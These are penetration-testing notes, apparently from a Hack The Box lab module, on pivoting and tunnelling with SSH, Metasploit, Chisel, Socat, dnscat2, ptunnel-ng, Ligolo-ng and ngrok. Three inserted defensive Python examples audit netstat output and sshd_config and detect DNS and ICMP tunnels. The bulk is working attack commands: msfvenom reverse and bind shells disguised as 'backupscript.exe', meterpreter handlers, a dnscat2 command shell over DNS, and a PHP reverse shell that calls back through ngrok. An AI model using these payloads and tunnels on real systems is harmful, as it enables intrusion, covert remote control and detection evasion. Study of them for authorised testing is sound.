Pivot, Tunneling and Port Forwarding
SSH
Local port forwarding
MySQL listening on port 3306 on the victim's localhost (found with netstat -tulpn):
ssh -L 1234:localhost:3306 ubuntu@10.129.202.64

The -L option tells the SSH client to ask the SSH server to forward everything we send to local port 1234 on to localhost:3306 on the Ubuntu server.
$ nmap -v -sV -p1234 localhost
PORT STATE SERVICE VERSION
1234/tcp open mysql MySQL 8.0.28-0ubuntu0.20.04.3

Web server listening on localhost
user@box:~$ netstat -tulpn
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:8080 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:33060 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:33209 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:37285 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3000 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:43765 0.0.0.0:* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 :::21 :::* LISTEN -
udp 0 0 127.0.0.53:53 0.0.0.0:* -
udp 0 0 0.0.0.0:68 0.0.0.0:* -

The web server is on 127.0.0.1:8080:
ssh -L 8888:localhost:8080 user@box.htb
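An added check, not part of the original notes: the Python below parses `netstat -tulpn` output such as the listing above and separates loopback-only listeners from network-exposed ones. The security point behind the -L forward above is that a 127.0.0.1 bind hides a service from the network but not from anyone holding an SSH login on a server that allows TCP forwarding, so the loopback-only list is exactly what such a login exposes. The sample input is a constructed, trimmed copy of the listing above; `SAMPLE_NETSTAT` and the function names are mine.

```python
"""Classify listening sockets from `netstat -tulpn` output.

Added example, not part of the original notes. A loopback bind keeps a
service off the network, but an SSH user with TCP forwarding (-L) reaches
it as if it were local, so the loopback-only list below is the set of
services that an SSH port forward would expose.
"""
import ipaddress

# Constructed sample: a trimmed copy of the netstat listing in the notes.
SAMPLE_NETSTAT = """\
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:8080          0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:3000          0.0.0.0:*               LISTEN      -
tcp6       0      0 :::22                   :::*                    LISTEN      -
udp        0      0 127.0.0.53:53           0.0.0.0:*                           -
udp        0      0 0.0.0.0:68              0.0.0.0:*                           -
"""


def parse_listeners(text):
    """Return (proto, address, port) for every socket line in netstat output."""
    sockets = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 4 or fields[0] not in ("tcp", "tcp6", "udp", "udp6"):
            continue  # banner, header or blank line
        proto, local = fields[0], fields[3]
        # Split on the last colon only: the IPv6 wildcard ':::22' -> ('::', '22').
        addr, port = local.rsplit(":", 1)
        sockets.append((proto, addr, int(port)))
    return sockets


def is_loopback(addr):
    """True for 127.0.0.0/8 and ::1; '0.0.0.0' and '::' are wildcard binds."""
    try:
        return ipaddress.ip_address(addr).is_loopback
    except ValueError:
        return False


def loopback_only_listeners(text):
    """Services reachable only from the host itself or through a forward."""
    return sorted(s for s in parse_listeners(text) if is_loopback(s[1]))


def exposed_listeners(text):
    """Services bound to a wildcard or routable address."""
    return sorted(s for s in parse_listeners(text) if not is_loopback(s[1]))


if __name__ == "__main__":
    print("reachable only via a port forward:")
    for proto, addr, port in loopback_only_listeners(SAMPLE_NETSTAT):
        print(f"  {proto:5} {addr}:{port}")
    print("exposed on the network:")
    for proto, addr, port in exposed_listeners(SAMPLE_NETSTAT):
        print(f"  {proto:5} {addr}:{port}")
```

Run against real output by replacing `SAMPLE_NETSTAT` with the captured text; `ss -tulpn` uses the same column positions for the local address, so the parser works on it too.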
Forwarding multiple ports
ssh -L 1234:localhost:3306 -L 8080:localhost:80 ubuntu@10.129.202.64

Dynamic Port Forwarding with SSH
ssh -D 9050 ubuntu@10.129.202.64
$ tail -4 /etc/proxychains.conf
# meanwile
# defaults set to "tor"
socks4 127.0.0.1 9050

proxychains nmap -v -sn 172.16.5.1-200 -sT
proxychains nmap -v -Pn -sT 172.16.5.19

Remote / reverse port forward
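Every -L, -R and -D forward on this page only works if the SSH server permits it, and that is controlled by a handful of sshd_config directives. As an added, defender-side example (not from the original notes and not OpenSSH code), the Python below parses an sshd_config and reports the forwarding-related directives that are not in their restrictive state, honouring two sshd parsing rules: the first value of a keyword wins, and lines after a `Match` apply only to matching connections, where they override the global value. `SAMPLE_SSHD_CONFIG` is a constructed file modelled on the tunnel-user config edited further down (Port 2222, PasswordAuthentication yes, AllowUsers tunnel); the directive names and built-in defaults are OpenSSH's, the function names are assumptions.

```python
"""Audit the sshd_config directives that govern SSH tunnelling.

Added example, not part of the original notes. sshd keeps the first value
it reads for a keyword (later duplicates are ignored), and lines after a
`Match` apply only to connections matching its criteria and override the
global value there, so the audit reports both scopes.
"""
import re

# Directive -> (hardened value, predicate accepting a hardened setting).
# PermitOpen/PermitListen count as hardened when set to anything but "any".
FORWARDING_KEYS = {
    "allowtcpforwarding": ("no", lambda v: v == "no"),        # -L / -R / -D
    "gatewayports": ("no", lambda v: v == "no"),              # -R bound to 0.0.0.0
    "permittunnel": ("no", lambda v: v == "no"),              # ssh -w tun devices
    "allowagentforwarding": ("no", lambda v: v == "no"),
    "permitopen": ("restricted", lambda v: v != "any"),       # -L / -D destinations
    "permitlisten": ("restricted", lambda v: v != "any"),     # -R listen ports
}

# OpenSSH built-in defaults that apply when the directive is absent.
DEFAULTS = {
    "allowtcpforwarding": "yes",
    "gatewayports": "no",
    "permittunnel": "no",
    "allowagentforwarding": "yes",
    "permitopen": "any",
    "permitlisten": "any",
}

# Constructed sample modelled on the tunnel-user setup in the notes.
SAMPLE_SSHD_CONFIG = """\
Port 2222
PasswordAuthentication yes
AllowUsers tunnel
# sshd keeps the first value, so the second AllowTcpForwarding line is ignored
AllowTcpForwarding yes
AllowTcpForwarding no
GatewayPorts yes
Match User tunnel
    AllowTcpForwarding no
    PermitListen 127.0.0.1:1080
"""

# sshd accepts "Keyword value" and "Keyword=value"; keywords are case-insensitive.
_DIRECTIVE = re.compile(r"([A-Za-z]+)\s*=?\s*(.*)")


def parse_sshd_config(text):
    """Return (global_cfg, match_blocks).

    global_cfg maps lower-cased keyword -> first value seen;
    match_blocks is a list of (criteria, {keyword: value}) in file order.
    """
    global_cfg, match_blocks, current = {}, [], None
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop comment lines and whitespace
        if not line:
            continue
        m = _DIRECTIVE.match(line)
        if not m:
            continue
        key, value = m.group(1).lower(), m.group(2).strip()
        if key == "match":
            current = {}                       # everything below is conditional
            match_blocks.append((value, current))
            continue
        target = global_cfg if current is None else current
        target.setdefault(key, value)          # first occurrence wins
    return global_cfg, match_blocks


def audit_forwarding(text):
    """Return findings as (keyword, scope, value, hardened_value) tuples."""
    global_cfg, match_blocks = parse_sshd_config(text)
    findings = []
    for key, (hardened, is_ok) in FORWARDING_KEYS.items():
        value = global_cfg.get(key, DEFAULTS[key]).lower()
        if not is_ok(value):
            findings.append((key, "global", value, hardened))
        for criteria, cfg in match_blocks:
            if key in cfg and not is_ok(cfg[key].lower()):
                findings.append((key, "Match " + criteria, cfg[key], hardened))
    return findings


if __name__ == "__main__":
    for key, scope, value, hardened in audit_forwarding(SAMPLE_SSHD_CONFIG):
        print(f"{scope:20} {key:22} = {value!r:18} (hardened: {hardened})")
```

On the sample the global `AllowTcpForwarding yes` is reported even though a later line says `no`, because sshd ignores the second line; the `Match User tunnel` block is clean because it disables forwarding and pins PermitListen to a single loopback port. Run `sshd -T` on the server to see the effective values sshd itself computed.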
ssh -R <InternalIPofPivotHost>:8080:0.0.0.0:8000 ubuntu@<ourIP> -vN

Attacker host
Create user
sudo adduser tunnel
sudo usermod -aG sudo tunnel

Configure SSH server
vim /etc/ssh/sshd_config
Add:
PasswordAuthentication yes
AllowUsers tunnel
Port 2222

Restart SSH server
sudo systemctl restart sshd

or inside a Docker container:
[Jan 18, 2025 - 03:43:07 (EST)] exegol-default /workspace # sudo mkdir -p /run/sshd
[Jan 18, 2025 - 03:43:44 (EST)] exegol-default /workspace # sudo chmod 0755 /run/sshd
[Jan 18, 2025 - 03:43:52 (EST)] exegol-default /workspace # /usr/sbin/sshd
[Jan 18, 2025 - 03:43:58 (EST)] exegol-default /workspace # service ssh status
sshd is running.

2 - On victim - Connect to our host
ssh tunnel@10.8.1.254 -R 1080 -p 2222 -N
Attacker host:
# proxychains nmap -p 389,445 -Pn 172.16.41.14 -sT

WinSSH
Metasploit
MSF's SOCKS Proxy
msf6 > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > set SRVPORT 9050
SRVPORT => 9050
msf6 auxiliary(server/socks_proxy) > set SRVHOST 0.0.0.0
SRVHOST => 0.0.0.0
msf6 auxiliary(server/socks_proxy) > set version 4a
version => 4a
msf6 auxiliary(server/socks_proxy) > run
[*] Auxiliary module running as background job 0.
[*] Starting the SOCKS proxy server
msf6 auxiliary(server/socks_proxy) > options
Module options (auxiliary/server/socks_proxy):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The address to listen on
SRVPORT 9050 yes The port to listen on
VERSION 4a yes The SOCKS version to use (Accepted: 4a, 5)
Auxiliary action:
Name Description
---- -----------
Proxy Run a SOCKS proxy server

proxychains:
socks4 127.0.0.1 9050

Autoroute
msf6 > use post/multi/manage/autoroute
msf6 post(multi/manage/autoroute) > set SESSION 1
SESSION => 1
msf6 post(multi/manage/autoroute) > set SUBNET 172.16.5.0
SUBNET => 172.16.5.0
msf6 post(multi/manage/autoroute) > run
[!] SESSION may not be compatible with this module:
[!] * incompatible session platform: linux
[*] Running module against 10.129.202.64
[*] Searching for subnets to autoroute.
[+] Route added to subnet 10.129.0.0/255.255.0.0 from host's routing table.
[+] Route added to subnet 172.16.5.0/255.255.254.0 from host's routing table.
[*] Post module execution completed

or
meterpreter > run autoroute -s 172.16.5.0/23
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] Adding a route to 172.16.5.0/255.255.254.0...
[+] Added route to 172.16.5.0/255.255.254.0 via 10.129.202.64
[*] Use the -p option to list all active routes

Listing autoroute
meterpreter > run autoroute -p
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
Active Routing Table
====================
Subnet Netmask Gateway
------ ------- -------
10.129.0.0 255.255.0.0 Session 1
172.16.4.0 255.255.254.0 Session 1
172.16.5.0 255.255.254.0 Session 1

Test:
proxychains nmap 172.16.5.19 -p3389 -sT -v -Pn

MSF local port forward
meterpreter > portfwd add -l 3300 -p 3389 -r 172.16.5.19
[*] Local TCP relay created: :3300 <-> 172.16.5.19:3389

The command above asks the Meterpreter session to start a listener on our attack host's local port (-l) 3300 and to forward all packets to the remote (-r) Windows server 172.16.5.19 on port (-p) 3389 via the Meterpreter session.
xfreerdp /v:localhost:3300 /u:victor /p:pass@123

Meterpreter Reverse Port Forwarding
meterpreter > portfwd add -R -l 8081 -p 1234 -L 10.10.14.18
[*] Local TCP relay created: 10.10.14.18:8081 <-> :1234
meterpreter > bg
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LPORT 8081
LPORT => 8081
msf6 exploit(multi/handler) > set LHOST 0.0.0.0
LHOST => 0.0.0.0
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 0.0.0.0:8081

We can now create a reverse shell payload that, when executed on the Windows host, connects back to our Ubuntu server on 172.16.5.129:1234. When the Ubuntu server receives that connection, it forwards it to our attack host's IP on port 8081, as configured above.
$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.5.129 -f exe -o backupscript.exe LPORT=1234
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes
Saved as: backupscript.exe

[*] Started reverse TCP handler on 0.0.0.0:8081
[*] Sending stage (200262 bytes) to 10.10.14.18
[*] Meterpreter session 2 opened (10.10.14.18:8081 -> 10.10.14.18:40173 ) at 2022-03-04 15:26:14 -0500
meterpreter > shell
Process 2336 created.
Channel 1 created.
Microsoft Windows [Version 10.0.17763.1637]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\>

Resources
Proxychains
proxychains -q <cmd> : quiet mode
Nmap over proxychains: proxychains -q nmap -sT IP PORT
tun2socks
Chisel
Socks4
user@box:~$ netstat -tulpn
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:8080 0.0.0.0:* LISTEN -

# ./chisel server -v -p 1234 --reverse
user@box:/tmp$ ./chisel client 10.10.14.136:1234 R:8080:127.0.0.1:8080
# proxychains curl http://127.0.0.1:8080

If proxychains does not work, try without it:
# curl http://127.0.0.1:8080
<!DOCTYPE html>
<html lang="en" data-bs-theme="light">
<head>
<--SNIP-->

Socks5
0xss0rz@htb[/htb]$ cat /etc/proxychains.conf
<SNIP>
[ProxyList]
socks5 127.0.0.1 1080

0xss0rz@htb[/htb]$ wget https://github.com/jpillora/chisel/releases/download/v1.7.7/chisel_1.7.7_linux_amd64.gz
0xss0rz@htb[/htb]$ gzip -d chisel_1.7.7_linux_amd64.gz
0xss0rz@htb[/htb]$ mv chisel_* chisel && chmod +x ./chisel
0xss0rz@htb[/htb]$ sudo ./chisel server --reverse
2022/10/10 07:26:15 server: Reverse tunneling enabled
2022/10/10 07:26:15 server: Fingerprint 58EulHjQXAOsBRpxk232323sdLHd0r3r2nrdVYoYeVM=
2022/10/10 07:26:15 server: Listening on http://0.0.0.0:8080

C:\htb> c:\tools\chisel.exe client 10.10.14.33:8080 R:socks
2022/10/10 06:34:19 client: Connecting to ws://10.10.14.33:8080
2022/10/10 06:34:20 client: Connected (Latency 125.6177ms)

or choose another port:
./chisel server -v -p 1234 --socks5

Socat
Socat Reverse shell
On pivot host
ubuntu@Webserver:~$ socat TCP4-LISTEN:8080,fork TCP4:10.10.14.18:80

Socat listens on port 8080 on the pivot host and forwards all traffic to port 80 on our attack host (10.10.14.18).
$ msfvenom -p windows/x64/meterpreter/reverse_https LHOST=172.16.5.129 -f exe -o backupscript.exe LPORT=8080

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_https
payload => windows/x64/meterpreter/reverse_https
msf6 exploit(multi/handler) > set lhost 0.0.0.0
lhost => 0.0.0.0
msf6 exploit(multi/handler) > set lport 80
lport => 80
msf6 exploit(multi/handler) > run
[*] Started HTTPS reverse handler on https://0.0.0.0:80
[!] https://0.0.0.0:80 handling request from 10.129.202.64; (UUID: 8hwcvdrp) Without a database connected that payload UUID tracking will not work!
[*] https://0.0.0.0:80 handling request from 10.129.202.64; (UUID: 8hwcvdrp) Staging x64 payload (201308 bytes) ...
[!] https://0.0.0.0:80 handling request from 10.129.202.64; (UUID: 8hwcvdrp) Without a database connected that payload UUID tracking will not work!
[*] Meterpreter session 1 opened (10.10.14.18:80 -> 127.0.0.1 ) at 2022-03-07 11:08:10 -0500
meterpreter > getuid
Server username: INLANEFREIGHT\victor

Socat Bind shell
$ msfvenom -p windows/x64/meterpreter/bind_tcp -f exe -o backupscript.exe LPORT=8443
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 499 bytes
Final size of exe file: 7168 bytes
Saved as: backupjob.exe

Socat bind-shell listener, which listens on port 8080 and forwards packets to the Windows server on port 8443.
On pivot machine:
ubuntu@Webserver:~$ socat TCP4-LISTEN:8080,fork TCP4:172.16.5.19:8443

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/bind_tcp
payload => windows/x64/meterpreter/bind_tcp
msf6 exploit(multi/handler) > set RHOST 10.129.202.64
RHOST => 10.129.202.64
msf6 exploit(multi/handler) > set LPORT 8080
LPORT => 8080
msf6 exploit(multi/handler) > run
[*] Started bind TCP handler against 10.129.202.64:8080
[*] Sending stage (200262 bytes) to 10.129.202.64
[*] Meterpreter session 1 opened (10.10.14.18:46253 -> 10.129.202.64:8080 ) at 2022-03-07 12:44:44 -0500
meterpreter > getuid
Server username: INLANEFREIGHT\victor

Plink
If the host is older and PuTTY is present (or we can find a copy on a file share), Plink can be our path to victory. We can use it to create our pivot and potentially avoid detection a little longer.
plink -ssh -D 9050 ubuntu@10.129.15.50

Proxifier can be used to start a SOCKS tunnel via the SSH session we created.
Portable version:

SSHuttle
sshuttle removes the need to configure proxychains. However, it only works for pivoting over SSH and provides no other pivoting options.
sudo apt-get install sshuttle
sudo sshuttle -r ubuntu@10.129.202.64 172.16.5.0/23 -v

Rpivot
sudo git clone https://github.com/klsecservices/rpivot.git
sudo apt-get install python2.7
python2.7 server.py --proxy-port 9050 --server-port 9999 --server-ip 0.0.0.0
scp -r rpivot ubuntu@<IpaddressOfTarget>:/home/ubuntu/

Run the client from the pivot machine:
ubuntu@WEB01:~/rpivot$ python2.7 client.py --server-ip 10.10.14.18 --server-port 9999

HTTP proxy and NTLM auth
python client.py --server-ip <IPaddressofTargetWebServer> --server-port 8080 --ntlm-proxy-ip <IPaddressofProxy> --ntlm-proxy-port 8081 --domain <nameofWindowsDomain> --username <username> --password <password>

Configure proxychains to pivot over our local server on 127.0.0.1:9050:
proxychains firefox-esr 172.16.5.135:80

Netsh
C:\Windows\system32> netsh.exe interface portproxy add v4tov4 listenport=8080 listenaddress=10.129.15.150 connectport=3389 connectaddress=172.16.5.25
C:\Windows\system32> netsh.exe interface portproxy show v4tov4

Listen on ipv4:             Connect to ipv4:

Address         Port        Address         Port
--------------- ----------  --------------- ----------
10.129.42.198   8080        172.16.5.25     3389
DNScat2
DNS Tunneling
$ git clone https://github.com/iagox86/dnscat2.git
cd dnscat2/server/
sudo gem install bundler
sudo bundle install
sudo ruby dnscat2.rb --dns host=10.10.14.18,port=53,domain=inlanefreight.local --no-cache

Doesn't work on Exegol => use Ubuntu:
sudo apt install ruby-dev
sudo apt install gem
sudo apt install ruby-rubygems
export PATH="$PATH:$HOME/.rvm/bin"

The server prints the pre-shared secret key when it starts.

git clone https://github.com/lukebaggett/dnscat2-powershell.git

Import dnscat2 on the Windows victim
Set-ExecutionPolicy Unrestricted
PS C:\htb> Import-Module .\dnscat2.ps1
PS C:\htb> Start-Dnscat2 -DNSserver 10.10.14.18 -Domain inlanefreight.local -PreSharedSecret 0ec04a91cd1e963f8c03ca499d589d21 -Exec cmd
New window created: 1
Session 1 Security: ENCRYPTED AND VERIFIED!
(the security depends on the strength of your pre-shared secret!)
dnscat2> ?
Here is a list of commands (use -h on any of them for additional help):
* echo
* help
* kill
* quit
* set
* start
* stop
* tunnels
* unset
* window
* windows

dnscat2> window -i 1
New window created: 1
history_size (session) => 1000
Session 1 Security: ENCRYPTED AND VERIFIED!
(the security depends on the strength of your pre-shared secret!)
This is a console session!
That means that anything you type will be sent as-is to the
client, and anything they type will be displayed as-is on the
screen! If the client is executing a command and you don't
see a prompt, try typing 'pwd' or something!
To go back, type ctrl-z.
Microsoft Windows [Version 10.0.18363.1801]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
exec (OFFICEMANAGER) 1>

ICMP Tunneling
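Before the ptunnel-ng commands that follow, an added detection-side example covering both the dnscat2 DNS tunnel above and the ICMP tunnel below (my code, not part of the notes or of either tool). dnscat2 encodes its channel in the hostname labels of queries for the attacker's zone, so one client sends many long, non-repeating, high-entropy names under a single domain; ptunnel-ng carries data in ICMP echo request/reply payloads, so one pair of hosts exchanges many echo packets far larger than the 56-byte payload of a normal ping. The code scores constructed DNS query records and constructed ICMP packet summaries for exactly those patterns. `DNS_QUERIES`, `ICMP_PACKETS`, the function names and the thresholds are assumptions, and treating the zone as the last two labels of a name is a simplification.

```python
"""Covert-channel indicators for DNS (dnscat2-style) and ICMP (ptunnel-style)
tunnels, evaluated over constructed records.

Added example, not part of the original notes or of either tool's code.
"""
import hashlib
import math
from collections import Counter, defaultdict

# Constructed DNS query log: (client, qname, qtype). The five generated names
# imitate tunnel chunks (two labels of hex); the rest are ordinary lookups.
DNS_QUERIES = [
    ("10.129.42.198", "www.microsoft.com", "A"),
    ("10.129.42.198", "www.microsoft.com", "A"),
    ("10.129.42.198", "login.microsoft.com", "A"),
    ("10.129.42.198", "update.microsoft.com", "A"),
    ("10.129.42.198", "www.microsoft.com", "AAAA"),
    ("10.129.42.197", "dc01.inlanefreight.local", "A"),
]
for _i in range(5):
    _chunk = hashlib.sha256(f"chunk{_i}".encode()).hexdigest()[:50]
    DNS_QUERIES.append(("10.129.42.198",
                        f"{_chunk[:32]}.{_chunk[32:]}.inlanefreight.local",
                        "TXT" if _i % 2 else "CNAME"))

# Constructed ICMP summary: (src, dst, icmp_type, payload_len);
# type 8 is echo request, type 0 is echo reply. First block: normal pings.
ICMP_PACKETS = (
    [("10.129.42.198", "10.129.202.64", 8, 56)] * 4
    + [("10.129.202.64", "10.129.42.198", 0, 56)] * 4
    + [("10.129.202.64", "10.10.14.18", 8, n) for n in (1024, 980, 1024, 1024, 64, 1024)]
    + [("10.10.14.18", "10.129.202.64", 0, n) for n in (1024, 1024, 512, 64, 1024, 1024)]
)


def shannon_entropy(s):
    """Bits of entropy per character of s (0.0 for an empty or uniform string)."""
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values()) if n else 0.0


def dns_tunnel_candidates(queries, min_queries=4, min_avg_len=30, min_unique=0.9):
    """Flag (client, zone) pairs whose subdomains look like encoded data.

    Assumption: the zone is the last two labels of the name; a real deployment
    would use the public suffix list or an allow-list of internal zones.
    """
    per_zone = defaultdict(list)
    for client, qname, _qtype in queries:
        labels = qname.lower().rstrip(".").split(".")
        per_zone[(client, ".".join(labels[-2:]))].append(".".join(labels[:-2]))
    findings = []
    for (client, zone), subs in per_zone.items():
        if len(subs) < min_queries:
            continue
        avg_len = sum(map(len, subs)) / len(subs)
        unique = len(set(subs)) / len(subs)          # tunnels rarely repeat a name
        avg_entropy = sum(shannon_entropy(s.replace(".", "")) for s in subs) / len(subs)
        if avg_len >= min_avg_len and unique >= min_unique:
            findings.append({"client": client, "zone": zone, "queries": len(subs),
                             "avg_subdomain_len": round(avg_len, 1),
                             "avg_entropy": round(avg_entropy, 2)})
    return findings


def icmp_tunnel_candidates(packets, min_packets=8, max_normal_payload=64):
    """Flag host pairs exchanging many echo packets with oversized payloads."""
    pairs = defaultdict(list)
    for src, dst, icmp_type, payload_len in packets:
        if icmp_type in (0, 8):
            pairs[tuple(sorted((src, dst)))].append(payload_len)
    findings = []
    for peers, sizes in pairs.items():
        oversized = sum(1 for n in sizes if n > max_normal_payload)
        if len(sizes) >= min_packets and oversized / len(sizes) >= 0.5:
            findings.append({"peers": peers, "packets": len(sizes),
                             "oversized": oversized, "max_payload": max(sizes)})
    return findings


if __name__ == "__main__":
    for f in dns_tunnel_candidates(DNS_QUERIES):
        print("DNS tunnel candidate:", f)
    for f in icmp_tunnel_candidates(ICMP_PACKETS):
        print("ICMP tunnel candidate:", f)
```

Both checks are per-source aggregates rather than per-packet signatures, because a single long TXT query or a single large ping is normal; it is the volume of them between one pair of endpoints that is not. Feed them from resolver query logs and a flow or pcap summary respectively.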
git clone https://github.com/utoni/ptunnel-ng.git
sudo ./autogen.sh
scp -r ptunnel-ng ubuntu@10.129.202.64:~/
ubuntu@WEB01:~/ptunnel-ng/src$ sudo ./ptunnel-ng -r10.129.202.64 -R22
-r: attacker host
sudo ./ptunnel-ng -p10.129.202.64 -l2222 -r10.129.202.64 -R22
ssh -p2222 -lubuntu 127.0.0.1

Port forward:
ssh -D 9050 -p2222 -lubuntu 127.0.0.1
$ proxychains nmap -sV -sT 172.16.5.19 -p3389
ProxyChains-3.1 (http://proxychains.sf.net)
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-11 11:10 EDT
|S-chain|-<>-127.0.0.1:9050-<><>-172.16.5.19:80-<><>-OK
|S-chain|-<>-127.0.0.1:9050-<><>-172.16.5.19:3389-<><>-OK
|S-chain|-<>-127.0.0.1:9050-<><>-172.16.5.19:3389-<><>-OK
Nmap scan report for 172.16.5.19
Host is up (0.12s latency).
PORT STATE SERVICE VERSION
3389/tcp open ms-wbt-server Microsoft Terminal Services
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.78 seconds

SocksOverRDP
Copy the SocksOverRDPx64.zip on the target
Load dll
C:\Users\htb-student\Desktop\SocksOverRDP-x64> regsvr32.exe SocksOverRDP-Plugin.dll

Connect to 172.16.5.19 over RDP using mstsc.exe; we should receive a prompt that the SocksOverRDP plugin is enabled and that it will listen on 127.0.0.1:1080.

We will need to transfer SocksOverRDPx64.zip or just the SocksOverRDP-Server.exe to 172.16.5.19. We can then start SocksOverRDP-Server.exe with Admin privileges.

After starting our listener, we can transfer Proxifier portable to the Windows 10 target (on the 10.129.x.x network) and configure it to forward all our packets to 127.0.0.1:1080. Proxifier will route traffic through the given host and port.

Profile > Proxy Servers > Add: 127.0.0.1, port 1080, SOCKS version 5
With Proxifier configured and running, we can start mstsc.exe; it will use Proxifier to pivot all our traffic via 127.0.0.1:1080, which tunnels it over RDP to 172.16.5.19, which in turn routes it to 172.16.6.155 using SocksOverRDP-Server.exe.

Ligolo-ng - The best tool
References
Moving the pivot between different hosts
[Mar 21, 2024 - 02:16:03 (EDT)] exegol-zephyr ligolo # sudo ip tuntap add user root mode tun ligolo
[Mar 21, 2024 - 02:16:15 (EDT)] exegol-zephyr ligolo # sudo ip link set ligolo up
[Mar 21, 2024 - 02:16:30 (EDT)] exegol-zephyr ligolo # scp lin-agent riley@10.10.110.35:/tmp/0xss0rz/lin-agent
riley@10.10.110.35's password:
lin-agent 100% 4572KB 4.9MB/s 00:00
[Mar 21, 2024 - 02:20:28 (EDT)] exegol-zephyr ligolo # ./lin-proxy -selfcert -laddr 0.0.0.0:443

riley@mail:/tmp/0xss0rz$ chmod +x lin-agent
riley@mail:/tmp/0xss0rz$ ./lin-agent -connect 10.10.14.4:443 -ignore-cert

ligolo-ng » INFO[0026] Agent joined. name=riley@mail remote="10.10.110.35:46489"
ligolo-ng » session
? Specify a session : 1 - #1 - riley@mail - 10.10.110.35:46489
[Agent : riley@mail] » start
[Agent : riley@mail] » INFO[0315] Starting tunnel to riley@mail
[Mar 21, 2024 - 02:25:58 (EDT)] exegol-zephyr /workspace # sudo ip route add 192.168.110.0/24 dev ligolo

Double Pivot (and more)
1st Pivot
sudo ip tuntap add user root mode tun ligolo
sudo ip link set ligolo up
./lin-proxy -selfcert -laddr 0.0.0.0:11601
./lin-agent -connect 10.10.14.2:11601 -ignore-cert
sudo ip route add 172.16.1.0/24 dev ligolo

2nd Pivot
Create a new interface:
sudo ip tuntap add user root mode tun ligolo2
sudo ip link set ligolo2 up
./lin-agent -connect 10.10.14.2:11601 -ignore-cert
start --tun ligolo2
sudo ip route add 172.16.2.0/24 dev ligolo2

3rd Pivot - the same thing (create a new interface, tunnel via the new interface); if the subnet is the same, don't forget to delete the old routes:
sudo ip route del 172.16.2.0/24 dev ligolo2

Reverse shell - File Transfer
# Shell on pivot address (172.16.8.120)
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.8.120 LPORT=1234 -f aspx > rs.aspx
# On ligolo, create a listener to forward the port
listener_add --addr 0.0.0.0:1234 --to 0.0.0.0:4444
# On host
msf6 exploit(multi/handler) > set lhost 0.0.0.0
lhost => 0.0.0.0
msf6 exploit(multi/handler) > set lport 4444
lport => 4444
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp

Tunnel to localhost
Bore
Ngrok
#1
./ngrok tcp 4444
#2
msfvenom -p php/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=13757 R > hack.php
